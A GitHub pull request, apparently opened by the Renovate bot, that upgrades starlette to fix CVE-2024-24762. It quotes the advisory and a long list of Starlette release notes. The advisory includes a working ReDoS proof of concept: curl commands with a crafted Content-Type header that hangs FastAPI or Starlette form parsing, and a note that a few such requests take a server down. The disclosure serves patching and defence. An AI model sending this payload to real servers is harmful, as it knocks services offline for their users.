search

ishare2-org / ishare2-web-gui

16 stars 3 forks source link

Update dependency starlette to <=0.36.2 [SECURITY] #37

Open renovate[bot] opened 6 months ago

renovate[bot] commented 6 months ago

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
starlette (changelog) <=0.28.0 -> <=0.36.2 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-24762

Summary

When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options.

An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.

This can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

This only applies when the app uses form data, parsed with python-multipart.

Details

A regular HTTP Content-Type header could look like:

Content-Type: text/html; charset=utf-8

python-multipart parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74

A custom option could be made and sent to the server to break it with:

Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

PoC

Create a simple WSGI application, that just parses the Content-Type, and run it with python main.py:


# main.py
from wsgiref.simple_server import make_server
from wsgiref.validate import validator

from multipart.multipart import parse_options_header

def simple_app(environ, start_response):
    _, _ = parse_options_header(environ["CONTENT_TYPE"])

    start_response("200 OK", [("Content-type", "text/plain")])
    return [b"Ok"]

httpd = make_server("", 8123, validator(simple_app))
print("Serving on port 8123...")
httpd.serve_forever()

Then send the attacking request with:

$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'

Impact

It's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. This way it also affects other libraries using Starlette, like FastAPI.

Original Report

This was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r

Original report to FastAPI Hey Tiangolo! My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @​nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON). Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code: ```Python from typing import Annotated from fastapi.responses import HTMLResponse from fastapi import FastAPI,Form from pydantic import BaseModel class Item(BaseModel): username: str app = FastAPI() @​app.get("/", response_class=HTMLResponse) async def index(): return HTMLResponse("Test", status_code=200) @​app.post("/submit/") async def submit(username: Annotated[str, Form()]): return {"username": username} @​app.post("/submit_json/") async def submit_json(item: Item): return {"username": item.username} ``` I'm running the above with uvicorn with the following command: ```console uvicorn server:app ``` Then run the following cUrl command: ``` curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/' ``` You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100% You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server. If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data. Cheers #### Impact An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data. #### Occurrences [params.py L586](https://togithub.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)

Release Notes

encode/starlette (starlette) ### [`v0.36.2`](https://togithub.com/encode/starlette/releases/tag/0.36.2): Version 0.36.2 [Compare Source](https://togithub.com/encode/starlette/compare/0.36.1...0.36.2) #### Fixed - Upgrade `python-multipart` to `0.0.7` [13e5c26](13e5c26a27f4903924624736abd6131b2da80cc5). - Avoid duplicate charset on `Content-Type` [#​2443](https://togithub.com/encode/starlette/2443). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.36.1...0.36.2 ### [`v0.36.1`](https://togithub.com/encode/starlette/releases/tag/0.36.1): Version 0.36.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.36.0...0.36.1) #### Fixed - Check if "extensions" in scope before checking the extension [#​2438](http://togithub.com/encode/starlette/pull/2438). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.36.0...0.36.1 ### [`v0.36.0`](https://togithub.com/encode/starlette/releases/tag/0.36.0): Version 0.36.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.35.1...0.36.0) #### Added - Add support for ASGI `pathsend` extension [#​2435](http://togithub.com/encode/starlette/pull/2435). - Cancel `WebSocketTestSession` on close [#​2427](http://togithub.com/encode/starlette/pull/2427). - Raise `WebSocketDisconnect` when `WebSocket.send()` excepts `IOError` [#​2425](http://togithub.com/encode/starlette/pull/2425). - Raise `FileNotFoundError` when the `env_file` parameter on `Config` is not valid [#​2422](http://togithub.com/encode/starlette/pull/2422). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.35.1...0.36.0 ### [`v0.35.1`](https://togithub.com/encode/starlette/releases/tag/0.35.1): Version 0.35.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.35.0...0.35.1) #### Fixed - Stop using the deprecated "method" parameter in `FileResponse` inside of `StaticFiles` [#​2406](https://togithub.com/encode/starlette/pull/2406). - Make `typing-extensions` optional again [#​2409](https://togithub.com/encode/starlette/pull/2409). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.35.0...0.35.1 ### [`v0.35.0`](https://togithub.com/encode/starlette/releases/tag/0.35.0): Version 0.35.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.34.0...0.35.0) #### Added - Add `*args` to `Middleware` and improve its type hints [#​2381](https://togithub.com/encode/starlette/pull/2381). #### Fixed - Use `Iterable` instead `Iterator` on `iterate_in_threadpool` [#​2362](https://togithub.com/encode/starlette/pull/2362). #### Changes - Handle `root_path` to keep compatibility with mounted ASGI applications and WSGI [#​2400](https://togithub.com/encode/starlette/pull/2400). - Turn `scope["client"]` to `None` on `TestClient` [#​2377](https://togithub.com/encode/starlette/pull/2377). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.34.0...0.35.0 ### [`v0.34.0`](https://togithub.com/encode/starlette/releases/tag/0.34.0): Version 0.34.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.33.0...0.34.0) #### Added - Use `ParamSpec` for `run_in_threadpool` [#​2375](https://togithub.com/encode/starlette/pull/2375). - Add `UploadFile.__repr__` [#​2360](https://togithub.com/encode/starlette/pull/2360). #### Fixed - Merge URLs properly on `TestClient` [#​2376](https://togithub.com/encode/starlette/pull/2376). - Take weak ETags in consideration on `StaticFiles` [#​2334](https://togithub.com/encode/starlette/pull/2334). #### Deprecated - Deprecate `FileResponse(method=...)` parameter [#​2366](https://togithub.com/encode/starlette/pull/2366). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.33.0...0.34.0 ### [`v0.33.0`](https://togithub.com/encode/starlette/releases/tag/0.33.0): Version 0.33.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.32.0.post1...0.33.0) #### Added - Add `middleware` per `Route`/`WebSocketRoute` [#​2349](https://togithub.com/encode/starlette/pull/2349). - Add `middleware` per `Router` [#​2351](https://togithub.com/encode/starlette/pull/2351). #### Fixed - Do not overwrite `"path"` and `"root_path"` scope keys [#​2352](https://togithub.com/encode/starlette/pull/2352). - Set `ensure_ascii=False` on `json.dumps()` for `WebSocket.send_json()` [#​2341](https://togithub.com/encode/starlette/pull/2341). ### [`v0.32.0.post1`](https://togithub.com/encode/starlette/releases/tag/0.32.0.post1): Version 0.32.0.post1 [Compare Source](https://togithub.com/encode/starlette/compare/0.32.0...0.32.0.post1) ##### Fixed - Revert mkdocs-material from 9.1.17 to 9.4.7 [#​2326](https://togithub.com/encode/starlette/pull/2326). ### [`v0.32.0`](https://togithub.com/encode/starlette/releases/tag/0.32.0): Version 0.32.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.31.1...0.32.0) #### Added - Send `reason` on `WebSocketDisconnect` [#​2309](https:://togithub.com/encode/starlette/pull/2309). - Add `domain` parameter to `SessionMiddleware` [#​2280](https:://togithub.com/encode/starlette/pull/2280). #### Changed - Inherit from `HTMLResponse` instead of `Response` on `_TemplateResponse` [#​2274](https://togithub.com/encode/starlette/pull/2274). - Restore the `Response.render` type annotation to its pre-0.31.0 state [#​2264](https://togithub.com/encode/starlette/pull/2264). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.31.1...0.32.0 ### [`v0.31.1`](https://togithub.com/encode/starlette/releases/tag/0.31.1): Version 0.31.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.31.0...0.31.1) ##### Fixed - Fix import error when `exceptiongroup` isn't available [#​2231](https://togithub.com/encode/starlette/pull/2231). - Set `url_for` global for custom Jinja environments [#​2230](https://togithub.com/encode/starlette/pull/2230). **Full Changelog**: https://github.com/encode/starlette/compare/0.31.0...0.31.1 ### [`v0.31.0`](https://togithub.com/encode/starlette/releases/tag/0.31.0): Version 0.31.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.30.0...0.31.0) #### Added - Officially support Python 3.12 [#​2214](https://togithub.com/encode/starlette/pull/2214). - Support AnyIO 4.0 [#​2211](https://togithub.com/encode/starlette/pull/2211). - Strictly type annotate Starlette (strict mode on mypy) [#​2180](https://togithub.com/encode/starlette/pull/2180). #### Fixed - Don't group duplicated headers on a single string when using the `TestClient` [#​2219](https://togithub.com/encode/starlette/pull/2219). *** **Full Changelog**: https://github.com/encode/starlette/compare/0.30.0...0.31.0 ### [`v0.30.0`](https://togithub.com/encode/starlette/releases/tag/0.30.0): Version 0.30.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.29.0...0.30.0) ##### Removed - Drop Python 3.7 support [#​2178](https://togithub.com/encode/starlette/pull/2178). ### [`v0.29.0`](https://togithub.com/encode/starlette/releases/tag/0.29.0): Version 0.29.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.28.0...0.29.0) #### Added - Add `follow_redirects` parameter to `TestClient` [#​2207](https://togithub.com/encode/starlette/pull/2207). - Add `__str__` to `HTTPException` and `WebSocketException` [#​2181](https://togithub.com/encode/starlette/pull/2181). - Warn users when using `lifespan` together with `on_startup`/`on_shutdown` [#​2193](https://togithub.com/encode/starlette/pull/2193). - Collect routes from `Host` to generate the OpenAPI schema [#​2183](https://togithub.com/encode/starlette/pull/2183). - Add `request` argument to `TemplateResponse` [#​2191](https://togithub.com/encode/starlette/pull/2191). #### Fixed - Stop `body_stream` in case `more_body=False` on `BaseHTTPMiddleware` [#​2194](https://togithub.com/encode/starlette/pull/2194). **Full Changelog**: https://github.com/encode/starlette/compare/0.28.0...0.29.0 ### [`v0.28.0`](https://togithub.com/encode/starlette/releases/tag/0.28.0): Version 0.28.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.27.0...0.28.0) ##### Changed - Reuse `Request`'s body buffer for call_next in `BaseHTTPMiddleware` [#​1692](https://togithub.com/encode/starlette/pull/1692). - Move exception handling logic to `Route` [#​2026](https://togithub.com/encode/starlette/pull/2026). ##### Added - Add `env` parameter to `Jinja2Templates`, and deprecate `**env_options` [#​2159](https://togithub.com/encode/starlette/pull/2159). - Add clear error message when `httpx` is not installed [#​2177](https://togithub.com/encode/starlette/pull/2177). ##### Fixed - Allow "name" argument on `templates url_for()` [#​2127](https://togithub.com/encode/starlette/pull/2127). **Full Changelog**: https://github.com/encode/starlette/compare/0.27.0...0.28.0 ### [`v0.27.0`](https://togithub.com/encode/starlette/releases/tag/0.27.0): Version 0.27.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.26.1...0.27.0) This release fixes a path traversal vulnerability in `StaticFiles`. You can view the full security advisory: https://github.com/encode/starlette/security/advisories/GHSA-v5gw-mw7f-84px ##### Added - Minify JSON websocket data via `send_json` [https://github.com/encode/starlette/pull/2128](https://togithub.com/encode/starlette/pull/2128) ##### Fixed - Replace `commonprefix` by `commonpath` on `StaticFiles` [1797de4](https://togithub.com/encode/starlette/commit/1797de464124b090f10cf570441e8292936d63e3). - Convert ImportErrors into ModuleNotFoundError [#​2135](https://togithub.com/encode/starlette/pull/2135). - Correct the RuntimeError message content in websockets [#​2141](https://togithub.com/encode/starlette/pull/2141). **Full Changelog**: https://github.com/encode/starlette/compare/0.26.1...0.27.0 ### [`v0.26.1`](https://togithub.com/encode/starlette/releases/tag/0.26.1): Version 0.26.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.26.0.post1...0.26.1) ##### Fixed - Fix typing of Lifespan to allow subclasses of Starlette [#​2077](https://togithub.com/encode/starlette/pull/2077). ### [`v0.26.0.post1`](https://togithub.com/encode/starlette/releases/tag/0.26.0.post1): Version 0.26.0.post1 [Compare Source](https://togithub.com/encode/starlette/compare/0.26.0...0.26.0.post1) ##### Fixed - Replace reference from Events to Lifespan on the mkdocs.yml [#​2072](https://togithub.com/encode/starlette/pull/2072). ### [`v0.26.0`](https://togithub.com/encode/starlette/releases/tag/0.26.0): Version 0.26.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.25.0...0.26.0) ##### Added - Support [lifespan state](https://www.starlette.io/lifespan/) [#​2060](https://togithub.com/encode/starlette/pull/2060), [#​2065](https://togithub.com/encode/starlette/pull/2065) and [#​2064](https://togithub.com/encode/starlette/pull/2064). ##### Changed - Change `url_for` signature to return a `URL` instance [#​1385](https://togithub.com/encode/starlette/pull/1385). ##### Fixed - Allow "name" argument on `url_for()` and `url_path_for()` [#​2050](https://togithub.com/encode/starlette/pull/2050). ##### Deprecated - Deprecate `on_startup` and `on_shutdown` events [#​2070](https://togithub.com/encode/starlette/pull/2070). **Full Changelog**: https://github.com/encode/starlette/compare/0.25.0...0.26.0 ### [`v0.25.0`](https://togithub.com/encode/starlette/releases/tag/0.25.0): Version 0.25.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.24.0...0.25.0) ##### Fixed - Limit the number of fields and files when parsing `multipart/form-data` on the `MultipartParser` [8c74c2c](https://togithub.com/encode/starlette/commit/8c74c2c8dba7030154f8af18e016136bea1938fa) and [#​2036](https://togithub.com/encode/starlette/pull/2036). ### [`v0.24.0`](https://togithub.com/encode/starlette/releases/tag/0.24.0): Version 0.24.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.23.1...0.24.0) ##### Added - Allow `StaticFiles` to follow symlinks [#​1683](https://togithub.com/encode/starlette/pull/1683). - Allow `Request.form()` as a context manager [#​1903](https://togithub.com/encode/starlette/pull/1903). - Add `size` attribute to `UploadFile` [#​1405](https://togithub.com/encode/starlette/pull/1405). - Add `env_prefix` argument to `Config` [#​1990](https://togithub.com/encode/starlette/pull/1990). - Add template context processors [#​1904](https://togithub.com/encode/starlette/pull/1904). - Support `str` and `datetime` on `expires` parameter on the `Response.set_cookie` method [#​1908](https://togithub.com/encode/starlette/pull/1908). ##### Changed - Lazily build the middleware stack [#​2017](https://togithub.com/encode/starlette/pull/2017). - Make the `file` argument required on `UploadFile` [#​1413](https://togithub.com/encode/starlette/pull/1413). - Use debug extension instead of custom response template extension [#​1991](https://togithub.com/encode/starlette/pull/1991). ##### Fixed - Fix url parsing of ipv6 urls on `URL.replace` [#​1965](https://togithub.com/encode/starlette/pull/1965). ### [`v0.23.1`](https://togithub.com/encode/starlette/releases/tag/0.23.1): Version 0.23.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.23.0...0.23.1) ##### Fixed - Only stop receiving stream on `body_stream` if body is empty on the `BaseHTTPMiddleware` [#​1940](https://togithub.com/encode/starlette/pull/1940). ### [`v0.23.0`](https://togithub.com/encode/starlette/releases/tag/0.23.0): Version 0.23.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.22.0...0.23.0) ##### Added - Add `headers` parameter to the `TestClient` [#​1966](https://togithub.com/encode/starlette/pull/1966). ##### Deprecated - Deprecate `Starlette` and `Router` decorators [#​1897](https://togithub.com/encode/starlette/pull/1897). ##### Fixed - Fix bug on `FloatConvertor` regex [#​1973](https://togithub.com/encode/starlette/pull/1973). ### [`v0.22.0`](https://togithub.com/encode/starlette/releases/tag/0.22.0): Version 0.22.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.21.0...0.22.0) ##### Changed - Bypass `GZipMiddleware` when response includes `Content-Encoding` [#​1901](https://togithub.com/encode/starlette/pull/1901). ##### Fixed - Remove unneeded `unquote()` from query parameters on the `TestClient` [#​1953](https://togithub.com/encode/starlette/pull/1953). - Make sure `MutableHeaders._list` is actually a `list` [#​1917](https://togithub.com/encode/starlette/pull/1917). - Import compatibility with the next version of `AnyIO` [#​1936](https://togithub.com/encode/starlette/pull/1936). ### [`v0.21.0`](https://togithub.com/encode/starlette/releases/tag/0.21.0): Version 0.21.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.20.4...0.21.0) This release replaces the underlying HTTP client used on the `TestClient` (`requests` :arrow_right: `httpx`), and as those clients [differ *a bit* on their API](https://www.python-httpx.org/compatibility/), your test suite will likely break. To make the migration smoother, you can use the [`bump-testclient`](https://togithub.com/Kludex/bump-testclient) tool. ##### Changed - Replace `requests` with `httpx` in `TestClient` [#​1376](https://togithub.com/encode/starlette/pull/1376). ##### Added - Add `WebSocketException` and support for WebSocket exception handlers [#​1263](https://togithub.com/encode/starlette/pull/1263). - Add `middleware` parameter to `Mount` class [#​1649](https://togithub.com/encode/starlette/pull/1649). - Officially support Python 3.11 [#​1863](https://togithub.com/encode/starlette/pull/1863). - Implement `__repr__` for route classes [#​1864](https://togithub.com/encode/starlette/pull/1864). ##### Fixed - Fix bug on which `BackgroundTasks` were cancelled when using `BaseHTTPMiddleware` and client disconnected [#​1715](https://togithub.com/encode/starlette/pull/1715). ### [`v0.20.4`](https://togithub.com/encode/starlette/releases/tag/0.20.4): Version 0.20.4 [Compare Source](https://togithub.com/encode/starlette/compare/0.20.3...0.20.4) ##### Fixed - Remove converter from path when generating OpenAPI schema [#​1648](https://togithub.com/encode/starlette/pull/1648). ### [`v0.20.3`](https://togithub.com/encode/starlette/releases/tag/0.20.3): Version 0.20.3 [Compare Source](https://togithub.com/encode/starlette/compare/0.20.2...0.20.3) ##### Fixed - Revert "Allow `StaticFiles` to follow symlinks" [#​1681](https://togithub.com/encode/starlette/pull/1681). ### [`v0.20.2`](https://togithub.com/encode/starlette/releases/tag/0.20.2): Version 0.20.2 [Compare Source](https://togithub.com/encode/starlette/compare/0.20.1...0.20.2) ##### Fixed - Fix regression on route paths with colons [#​1675](https://togithub.com/encode/starlette/pull/1675). - Allow `StaticFiles` to follow symlinks [#​1337](https://togithub.com/encode/starlette/pull/1377). ### [`v0.20.1`](https://togithub.com/encode/starlette/releases/tag/0.20.1): Version 0.20.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.20.0...0.20.1) ##### Fixed - Improve detection of async callables [#​1444](https://togithub.com/encode/starlette/pull/1444). - Send 400 (Bad Request) when `boundary` is missing [#​1617](https://togithub.com/encode/starlette/pull/1617). - Send 400 (Bad Request) when missing "name" field on `Content-Disposition` header [#​1643](https://togithub.com/encode/starlette/pull/1643). - Do not send empty data to `StreamingResponse` on `BaseHTTPMiddleware` [#​1609](https://togithub.com/encode/starlette/pull/1609). - Add `__bool__` dunder for `Secret` [#​1625](https://togithub.com/encode/starlette/pull/1625). ### [`v0.20.0`](https://togithub.com/encode/starlette/releases/tag/0.20.0): Version 0.20.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.19.1...0.20.0) ##### Removed - Drop Python 3.6 support [#​1357](https://togithub.com/encode/starlette/pull/1357) and [#​1616](https://togithub.com/encode/starlette/pull/1616). ### [`v0.19.1`](https://togithub.com/encode/starlette/releases/tag/0.19.1): Version 0.19.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.19.0...0.19.1) ##### Fixed - Fix inference of `Route.name` when created from methods [#​1553](https://togithub.com/encode/starlette/pull/1553). - Avoid `TypeError` on `websocket.disconnect` when code is `None` [#​1574](https://togithub.com/encode/starlette/pull/1574). ##### Deprecated - Deprecate `WS_1004_NO_STATUS_RCVD` and `WS_1005_ABNORMAL_CLOSURE` in favor of `WS_1005_NO_STATUS_RCVD` and `WS_1006_ABNORMAL_CLOSURE`, as the previous constants didn't match the [WebSockets specs](https://www.iana.org/assignments/websocket/websocket.xhtml) [#​1580](https://togithub.com/encode/starlette/pull/1580). ### [`v0.19.0`](https://togithub.com/encode/starlette/releases/tag/0.19.0): Version 0.19.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.18.0...0.19.0) ##### Added - Error handler will always run, even if the error happens on a background task [#​761](https://togithub.com/encode/starlette/pull/761). - Add `headers` parameter to `HTTPException` [#​1435](https://togithub.com/encode/starlette/pull/1435). - Internal responses with `405` status code insert an `Allow` header, as described by [RFC 7231](https://datatracker.ietf.org/doc/html/rfc7231#section-6.5.5) [#​1436](https://togithub.com/encode/starlette/pull/1436). - The `content` argument in `JSONResponse` is now required [#​1431](https://togithub.com/encode/starlette/pull/1431). - Add custom URL convertor register [#​1437](https://togithub.com/encode/starlette/pull/1437). - Add content disposition type parameter to `FileResponse` [#​1266](https://togithub.com/encode/starlette/pull/1266). - Add next query param with original request URL in requires decorator [#​920](https://togithub.com/encode/starlette/pull/920). - Add `raw_path` to `TestClient` scope [#​1445](https://togithub.com/encode/starlette/pull/1445). - Add union operators to `MutableHeaders` [#​1240](https://togithub.com/encode/starlette/pull/1240). - Display missing route details on debug page [#​1363](https://togithub.com/encode/starlette/pull/1363). - Change `anyio` required version range to `>=3.4.0,<5.0` [#​1421](https://togithub.com/encode/starlette/pull/1421) and [#​1460](https://togithub.com/encode/starlette/pull/1460). - Add `typing-extensions>=3.10` requirement - used only on lower versions than Python 3.10 [#​1475](https://togithub.com/encode/starlette/pull/1475). ##### Fixed - Prevent `BaseHTTPMiddleware` from hiding errors of `StreamingResponse` and mounted applications [#​1459](https://togithub.com/encode/starlette/pull/1459). - `SessionMiddleware` uses an explicit `path=...`, instead of defaulting to the ASGI 'root_path' [#​1512](https://togithub.com/encode/starlette/pull/1512). - `Request.client` is now compliant with the ASGI specifications [#​1462](https://togithub.com/encode/starlette/pull/1462). - Raise `KeyError` at early stage for missing boundary [#​1349](https://togithub.com/encode/starlette/pull/1349). ##### Deprecated - Deprecate WSGIMiddleware in favor of a2wsgi [#​1504](https://togithub.com/encode/starlette/pull/1504). - Deprecate `run_until_first_complete` [#​1443](https://togithub.com/encode/starlette/pull/1443). ### [`v0.18.0`](https://togithub.com/encode/starlette/releases/tag/0.18.0): Version 0.18.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.17.1...0.18.0) ##### Added - Change default chunk size from 4Kb to 64Kb on `FileResponse` [#​1345](https://togithub.com/encode/starlette/pull/1345). - Add support for `functools.partial` in `WebSocketRoute` [#​1356](https://togithub.com/encode/starlette/pull/1356). - Add `StaticFiles` packages with directory [#​1350](https://togithub.com/encode/starlette/pull/1350). - Allow environment options in `Jinja2Templates` [#​1401](https://togithub.com/encode/starlette/pull/1401). - Allow HEAD method on `HttpEndpoint` [#​1346](https://togithub.com/encode/starlette/pull/1346). - Accept additional headers on `websocket.accept` message [#​1361](https://togithub.com/encode/starlette/pull/1361) and [#​1422](https://togithub.com/encode/starlette/pull/1422). - Add `reason` to `WebSocket` close ASGI event [#​1417](https://togithub.com/encode/starlette/pull/1417). - Add headers attribute to `UploadFile` [#​1382](https://togithub.com/encode/starlette/pull/1382). - Don't omit `Content-Length` header for `Content-Length: 0` cases [#​1395](https://togithub.com/encode/starlette/pull/1395). - Don't set headers for responses with 1xx, 204 and 304 status code [#​1397](https://togithub.com/encode/starlette/pull/1397). - `SessionMiddleware.max_age` now accepts `None`, so cookie can last as long as the browser session [#​1387](https://togithub.com/encode/starlette/pull/1387). ##### Fixed - Tweak `hashlib.md5()` function on `FileResponse`s ETag generation. The parameter [`usedforsecurity`](https://bugs.python.org/issue9216) flag is set to `False`, if the flag is available on the system. This fixes an error raised on systems with [FIPS](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/FIPS_Mode\_-\_an_explanation) enabled [#​1366](https://togithub.com/encode/starlette/pull/1366) and [#​1410](https://togithub.com/encode/starlette/pull/1410). - Fix `path_params` type on `url_path_for()` method i.e. turn `str` into `Any` [#​1341](https://togithub.com/encode/starlette/pull/1341). - `Host` now ignores `port` on routing [#​1322](https://togithub.com/encode/starlette/pull/1322). ### [`v0.17.1`](https://togithub.com/encode/starlette/releases/tag/0.17.1): Version 0.17.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.17.0...0.17.1) ##### Fixed - Fix `IndexError` in authentication `requires` when wrapped function arguments are distributed between `*args` and `**kwargs` [#​1335](https://togithub.com/encode/starlette/pull/1335). ### [`v0.17.0`](https://togithub.com/encode/starlette/releases/tag/0.17.0): Version 0.17.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.16.0...0.17.0) ##### Added - `Response.delete_cookie` now accepts the same parameters as `Response.set_cookie` [#​1228](https://togithub.com/encode/starlette/pull/1228). - Update the `Jinja2Templates` constructor to allow `PathLike` [#​1292](https://togithub.com/encode/starlette/pull/1292). ##### Fixed - Fix BadSignature exception handling in SessionMiddleware [#​1264](https://togithub.com/encode/starlette/pull/1264). - Change `HTTPConnection.__getitem__` return type from `str` to `typing.Any` [#​1118](https://togithub.com/encode/starlette/pull/1118). - Change `ImmutableMultiDict.getlist` return type from `typing.List[str]` to `typing.List[typing.Any]` [#​1235](https://togithub.com/encode/starlette/pull/1235). - Handle `OSError` exceptions on `StaticFiles` [#​1220](https://togithub.com/encode/starlette/pull/1220). - Fix `StaticFiles` 404.html in HTML mode [#​1314](https://togithub.com/encode/starlette/pull/1314). - Prevent anyio.ExceptionGroup in error views under a BaseHTTPMiddleware [#​1262](https://togithub.com/encode/starlette/pull/1262). ##### Removed - Remove GraphQL support [#​1198](https://togithub.com/encode/starlette/pull/1198). ### [`v0.16.0`](https://togithub.com/encode/starlette/releases/tag/0.16.0): Version 0.16.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.15.0...0.16.0) ##### Added - Added [Encode](https://togithub.com/sponsors/encode) funding option [#​1219](https://togithub.com/encode/starlette/pull/1219) ##### Fixed - `starlette.websockets.WebSocket` instances are now hashable and compare by identity [#​1039](https://togithub.com/encode/starlette/pull/1039) - A number of fixes related to running task groups in lifespan [#​1213](https://togithub.com/encode/starlette/pull/1213), [#​1227](https://togithub.com/encode/starlette/pull/1227) ##### Deprecated/removed - The method `starlette.templates.Jinja2Templates.get_env` was removed [#​1218](https://togithub.com/encode/starlette/pull/1218) - The ClassVar `starlette.testclient.TestClient.async_backend` was removed, the backend is now configured using constructor kwargs [#​1211](https://togithub.com/encode/starlette/pull/1211) - Passing an Async Generator Function or a Generator Function to `starlette.router.Router(lifespan_context=)` is deprecated. You should wrap your lifespan in `@contextlib.asynccontextmanager`. [#​1227](https://togithub.com/encode/starlette/pull/1227) [#​1110](https://togithub.com/encode/starlette/pull/1110) ### [`v0.15.0`](https://togithub.com/encode/starlette/releases/tag/0.15.0): Version 0.15.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.14.2...0.15.0) #### 0.15.0 This release includes major changes to the low-level asynchronous parts of Starlette. As a result, **Starlette now depends on [AnyIO](https://anyio.readthedocs.io/en/stable/)** and some minor API changes have occurred. Another significant change with this release is the **deprecation of built-in GraphQL support**. ##### Added - Starlette now supports [Trio](https://trio.readthedocs.io/en/stable/) as an async runtime via AnyIO - [#​1157](https://togithub.com/encode/starlette/pull/1157). - `TestClient.websocket_connect()` now must be used as a context manager. - Initial support for Python 3.10 - [#​1201](https://togithub.com/encode/starlette/pull/1201). - The compression level used in `GZipMiddleware` is now adjustable - [#​1128](https://togithub.com/encode/starlette/pull/1128). ##### Fixed - Several fixes to `CORSMiddleware`. See [#​1111](https://togithub.com/encode/starlette/pull/1111), [#​1112](https://togithub.com/encode/starlette/pull/1112), [#​1113](https://togithub.com/encode/starlette/pull/1113), [#​1199](https://togithub.com/encode/starlette/pull/1199). - Improved exception messages in the case of duplicated path parameter names - [#​1177](https://togithub.com/encode/starlette/pull/1177). - `RedirectResponse` now uses `quote` instead of `quote_plus` encoding for the `Location` header to better match the behaviour in other frameworks such as Django - [#​1164](https://togithub.com/encode/starlette/pull/1164). - Exception causes are now preserved in more cases - [#​1158](https://togithub.com/encode/starlette/pull/1158). - Session cookies now use the ASGI root path in the case of mounted applications - [#​1147](https://togithub.com/encode/starlette/pull/1147). - Fixed a cache invalidation bug when static files were 